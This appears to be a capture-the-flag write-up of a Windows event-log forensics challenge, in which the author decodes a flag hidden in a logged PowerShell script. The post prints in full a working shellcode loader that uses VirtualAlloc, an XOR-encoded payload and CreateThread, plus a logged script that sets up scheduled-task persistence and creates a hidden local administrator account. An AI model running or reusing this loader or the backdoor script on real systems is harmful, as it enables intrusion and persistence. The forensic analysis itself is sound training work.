Posted on May 19, 2022
tl;dr: powershell deobfuscation


This was just an exploration in how to do things with both the host-system (windows) and also in linux. Like reading the event-logs and such. The route taken might not be the quickest, but it was fun to experiment with various ways to do things.


Each challenge had a story tied to it, for this challenge it was:

Planet Longhir is known for it’s top-tier researchers. Due to their dedication in science and engineering, their military equipment is the most advanced one in the galaxy.
In fact, the prototype DES-3000, a self-propelled precision-strike missile that is capable of reaching targets even in Ratnik galaxy, is being used to disable Galactic Federation’s communication satellites.
The mystery that Miyuki is trying to solve is, how the satellite’s location was leaked since it is a top-sercret that only Galactic Federation’s council is aware of. Help her analyse the Council’s HQ event logs and solve this mystery.

Attack the challenge

There’s a downloadable file:
containing Windows Logs , which needs to be analyzed in order to see how the satelite location was leaked. We assume that we’re looking for some type of GPS coordinates or lat/long.

The usual suspects:

grep -iR “HTB{” . // Returned nothing  
grep -iR “satelite” . // returned nothing  
grep -iR “lat” . // returned two files, mentioning that they are binary:

grep: ./Microsoft-Windows-LiveId%4Operational.evtx: binary file matches  
grep: ./Microsoft-Windows-Store%4Operational.evtx: binary file matches

Analyzing the “LiveId Operational” seems to show some type of communication with tokes and such. Probably rabbithole.

Next try:
The files are all named differently, with an annoying %4 and spaces, so rename all of them and remove spaces from filenames.
Afterwards, use the program: to convert all the evtx files to JSON.

small script to fix filenames:

FILER=$(ls /mnt/hgfs/VMSHARED/HTB/cyberApocalypse2022/forensics/puppeteer/Logs/test/*.evtx)    
# remove the space from the names  
for fil in $FILER  
newname=$(echo $fil | sed 's/ //g')  
mv $fil $newname  
# remove the %4 from name  
for fil in $FILER  
newname2=$(echo $fil | sed 's/%4//g')  
mv $fil $newname2  

and in order to not do everything manually, we simplify the evtx to json:

FILES=$(ls *.evtx)  
#evtx_dump -f <output_file> -o json <input_file>  
for FIL in $FILES; do  
./evtx_dump-v0.7.2-x86_64-unknown-linux-gnu -f "$FIL.json" -o json "$FIL"  

A lot of the JSON files were empty, so lets clear those out:

mkdir JSON  
mv *.json JSON/  
find JSON/ -empty -type f -delete

start searching through the JSON in order to see whether we can find some more interesting strings:

grep -iR "HQ" .  

looking for special_orders.ps1 led to some more interesting stuff like:

./Microsoft-Windows-PowerShellOperational.evtx.json: "ScriptBlockText":

 "$OleSPrlmhB = @\"\r\n[DllImport(\"kernel32.dll\")]\r\npublic static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);\r\n[DllImport(\"kernel32.dll\")]\r\npublic static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);\r\n\"@\r\n\r\n[byte[]] $stage1 = 0x99, 0x85, 0x93, 0xaa, 0xb3, 0xe2, 0xa6, 0xb9, 0xe5, 0xa3, 0xe2, 0x8e, 0xe1, 0xb7, 0x8e, 0xa5, 0xb9, 0xe2, 0x8e, 0xb3;\r\n[byte[]] $stage2 = 0xac, 0xff, 0xff, 0xff, 0xe2, 0xb2, 0xe0, 0xa5, 0xa2, 0xa4, 0xbb, 0x8e, 0xb7, 0xe1, 0x8e, 0xe4, 0xa5, 0xe1, 0xe1;\r\n\r\n$tNZvQCljVk = Add-Type -memberDefinition $OleSPrlmhB -Name \"Win32\" -namespace Win32Functions -passthru;\r\n\r\n[Byte[]] $HVOASfFuNSxRXR = 0x2d,0x99,0x52,0x35,0x21,0x39,0x1d,0xd1,0xd1,0xd1,0x90,0x80,0x90,0x81,0x83,0x99,0xe0,0x03,0xb4,0x99,0x5a,0x83,0xb1,0x99,0x5a,0x83,0xc9,0x80,0x87,0x99,0x5a,0x83,0xf1,0x99,0xde,0x66,0x9b,0x9b,0x9c,0xe0,0x18,0x99,0x5a,0xa3,0x81,0x99,0xe0,0x11,0x7d,0xed,0xb0,0xad,0xd3,0xfd,0xf1,0x90,0x10,0x18,0xdc,0x90,0xd0,0x10,0x33,0x3c,0x83,0x99,0x5a,0x83,0xf1,0x90,0x80,0x5a,0x93,0xed,0x99,0xd0,0x01,0xb7,0x50,0xa9,0xc9,0xda,0xd3,0xde,0x54,0xa3,0xd1,0xd1,0xd1,0x5a,0x51,0x59,0xd1,0xd1,0xd1,0x99,0x54,0x11,0xa5,0xb6,0x99,0xd0,0x01,0x5a,0x99,0xc9,0x81,0x95,0x5a,0x91,0xf1,0x98,0xd0,0x01,0x32,0x87,0x99,0x2e,0x18,0x9c,0xe0,0x18,0x90,0x5a,0xe5,0x59,0x99,0xd0,0x07,0x99,0xe0,0x11,0x90,0x10,0x18,0xdc,0x7d,0x90,0xd0,0x10,0xe9,0x31,0xa4,0x20,0x9d,0xd2,0x9d,0xf5,0xd9,0x94,0xe8,0x00,0xa4,0x09,0x89,0x95,0x5a,0x91,0xf5,0x98,0xd0,0x01,0xb7,0x90,0x5a,0xdd,0x99,0x95,0x5a,0x91,0xcd,0x98,0xd0,0x01,0x90,0x5a,0xd5,0x59,0x90,0x89,0x90,0x89,0x8f,0x88,0x99,0xd0,0x01,0x8b,0x90,0x89,0x90,0x88,0x90,0x8b,0x99,0x52,0x3d,0xf1,0x90,0x83,0x2e,0x31,0x89,0x90,0x88,0x8b,0x99,0x5a,0xc3,0x38,0x9a,0x2e,0x2e,0x2e,0x8c,0x98,0x6f,0xa6,0xa2,0xe3,0x8e,0xe2,0xe3,0xd1,0xd1,0x90,0x87,0x98,0x58,0x37,0x99,0x50,0x3d,0x71,0xd0,0xd1,0xd1,0x98,0x58,0x34,0x98,0x6d,0xd3,0xd1,0xd4,0xe8,0x11,0x79,0xd1,0xc3,0x90,0x85,0x98,0x58,0x35,0x9d,0x58,0x20,0x90,0x6b,0x9d,0xa6,0xf7,0xd6,0x2e,0x04,0x9d,0x58,0x3b,0xb9,0xd0,0xd0,0xd1,0xd1,0x88,0x90,0x6b,0xf8,0x51,0xba,0xd1,0x2e,0x04,0xbb,0xdb,0x90,0x8f,0x81,0x81,0x9c,0xe0,0x18,0x9c,0xe0,0x11,0x99,0x2e,0x11,0x99,0x58,0x13,0x99,0x2e,0x11,0x99,0x58,0x10,0x90,0x6b,0x3b,0xde,0x0e,0x31,0x2e,0x04,0x99,0x58,0x16,0xbb,0xc1,0x90,0x89,0x9d,0x58,0x33,0x99,0x58,0x28,0x90,0x6b,0x48,0x74,0xa5,0xb0,0x2e,0x04,0x54,0x11,0xa5,0xdb,0x98,0x2e,0x1f,0xa4,0x34,0x39,0x42,0xd1,0xd1,0xd1,0x99,0x52,0x3d,0xc1,0x99,0x58,0x33,0x9c,0xe0,0x18,0xbb,0xd5,0x90,0x89,0x99,0x58,0x28,0x90,0x6b,0xd3,0x08,0x19,0x8e,0x2e,0x04,0x52,0x29,0xd1,0xaf,0x84,0x99,0x52,0x15,0xf1,0x8f,0x58,0x27,0xbb,0x91,0x90,0x88,0xb9,0xd1,0xc1,0xd1,0xd1,0x90,0x89,0x99,0x58,0x23,0x99,0xe0,0x18,0x90,0x6b,0x89,0x75,0x82,0x34,0x2e,0x04,0x99,0x58,0x12,0x98,0x58,0x16,0x9c,0xe0,0x18,0x98,0x58,0x21,0x99,0x58,0x0b,0x99,0x58,0x28,0x90,0x6b,0xd3,0x08,0x19,0x8e,0x2e,0x04,0x52,0x29,0xd1,0xac,0xf9,0x89,0x90,0x86,0x88,0xb9,0xd1,0x91,0xd1,0xd1,0x90,0x89,0xbb,0xd1,0x8b,0x90,0x6b,0xda,0xfe,0xde,0xe1,0x2e,0x04,0x86,0x88,0x90,0x6b,0xa4,0xbf,0x9c,0xb0,0x2e,0x04,0x98,0x2e,0x1f,0x38,0xed,0x2e,0x2e,0x2e,0x99,0xd0,0x12,0x99,0xf8,0x17,0x99,0x54,0x27,0xa4,0x65,0x90,0x2e,0x36,0x89,0xbb,0xd1,0x88,0x98,0x16,0x13,0x21,0x64,0x73,0x87,0x2e,0x04;\r\n\r\n[array]::Reverse($stage2);\r\n\r\n$hRffYLENA = $tNZvQCljVk::VirtualAlloc(0,[Math]::Max($HVOASfFuNSxRXR.Length,0x1000),0x3000,0x40);\r\n\r\n$stage3 = $stage1 + $stage2;\r\n\r\n[System.Runtime.InteropServices.Marshal]::Copy($HVOASfFuNSxRXR,0,$hRffYLENA,$HVOASfFuNSxRXR.Length);\r\n\r\n\r\n# Unpack Shellcode;\r\n\r\nfor($i=0; $i -lt $HVOASfFuNSxRXR.count ; $i++)\r\n{\r\n $HVOASfFuNSxRXR[$i] = $HVOASfFuNSxRXR[$i] -bxor 0xd1;\r\n}\r\n\r\n#Unpack Special Orders!\r\n\r\nfor($i=0;$i -lt $stage3.count;$i++){\r\n $stage3[$i] = $stage3[$i] -bxor 0xd1;\r\n}\r\n\r\n$tNZvQCljVk::CreateThread(0,0,$hRffYLENA,0,0,0);\r\n"

further investigation of files containing HQ

in the file: Microsoft-Windows-PowerShellOperational.evtx there were some signs of a backup_op administrator being created, and some scheduled tasks to sabotage for miyuki

Log Name: Microsoft-Windows-PowerShell/Operational  
Source: Microsoft-Windows-PowerShell  
Date: 2022-05-06 17:43:51  
Event ID: 4104  
Task Category: Execute a Remote Command  
Level: Warning  
Keywords: None  
User: S-1-5-21-2389065719-3342106636-307857974-1002  
Computer: Council-HQ  
Creating Scriptblock text (1 of 1):  
# Create a new task action  
$taskAction = New-ScheduledTaskAction -Execute 'powershell.exe';  
$taskTrigger = New-ScheduledTaskTrigger -Daily -At 3PM;  
# The name of your scheduled task.  
$taskName = "Elevate Powers"  
# Describe the scheduled task.  
$description = "Steal weapons"  
# Register the scheduled task  
Register-ScheduledTask -TaskName $taskName -Action $taskAction -Trigger $taskTrigger -Description $description  
# Create a new task action  
$taskAction = New-ScheduledTaskAction -Execute 'powershell.exe';  
$taskTrigger = New-ScheduledTaskTrigger -Daily -At 3PM;  
# The name of your scheduled task.  
$taskName = "Sabotage Miyuki"  
# Describe the scheduled task.  
$description = "Bypass Arms Embargo"  
# Register the scheduled task  
Register-ScheduledTask -TaskName $taskName -Action $taskAction -Trigger $taskTrigger -Description $description  
#start windows update service  
Get-Service -Name wuauserv | Start-Service -Verbose  
#delete childs  
Get-ChildItem "C:\Windows\SoftwareDistribution\*" -Recurse -Force -Verbose -ErrorAction SilentlyContinue | remove-item -force -Verbose -recurse -ErrorAction SilentlyContinue  
#clear temp folder  
Get-ChildItem "C:\users\*\AppData\Local\Temp\*" -Recurse -Force -ErrorAction SilentlyContinue |  
Where-Object { ($_.CreationTime -lt $(Get-Date).AddDays(-$DaysToDelete))} |  
remove-item -force -Verbose -recurse -ErrorAction SilentlyContinue  
cleanmgr /sagerun:12  
do {  
"waiting for cleanmgr to complete. . ."  
start-sleep 5  
} while ((get-wmiobject win32_process | where-object {$_.processname -eq ‘cleanmgr.exe’} | measure).count)  
# Create Admin Account  
function Create-NewLocalAdmin {  
param (  
[string] $NewLocalAdmin,  
[securestring] $Password  
begin {  
process {  
New-LocalUser "$NewLocalAdmin" -Password $Password -FullName "$NewLocalAdmin" -Description "Temporary local admin"  
Write-Verbose "$NewLocalAdmin local user crated"  
Add-LocalGroupMember -Group "Administrators" -Member "$NewLocalAdmin"  
Write-Verbose "$NewLocalAdmin added to the local administrator group"  
end {  
$NewLocalAdmin = "backup_op";  
$Password = ConvertTo-SecureString "sup3rk3y" -AsPlainText -Force;  
Create-NewLocalAdmin -NewLocalAdmin $NewLocalAdmin -Password $Password

save the special_orders.ps1 script , and modify the code so just unpacking the special orders is run:

[byte[]] $stage1 = 0x99, 0x85, 0x93, 0xaa, 0xb3, 0xe2, 0xa6, 0xb9, 0xe5, 0xa3, 0xe2, 0x8e, 0xe1, 0xb7, 0x8e, 0xa5, 0xb9, 0xe2, 0x8e, 0xb3;  
[byte[]] $stage2 = 0xac, 0xff, 0xff, 0xff, 0xe2, 0xb2, 0xe0, 0xa5, 0xa2, 0xa4, 0xbb, 0x8e, 0xb7, 0xe1, 0x8e, 0xe4, 0xa5, 0xe1, 0xe1;  
$stage3 = $stage1 + $stage2;  
#Unpack Special Orders!  
for ($i = 0; $i -lt $stage3.count; $i++) {  
$stage3[$i] = $stage3[$i] -bxor 0xd1;  
write-host $stage3

run the powershell script and get characters in decimal output:

72 84 66 123 98 51 119 104 52 114 51 95 48 102 95 116 104 51 95 98 48 48 116 53 95 48 102 95 106 117 115 116 49 99 51 46 46 46 125

run that through cyberchef with decimal to ascii and get:

Flag: HTB{b3wh4r3_0f_th3_b00t5_0f_just1c3...}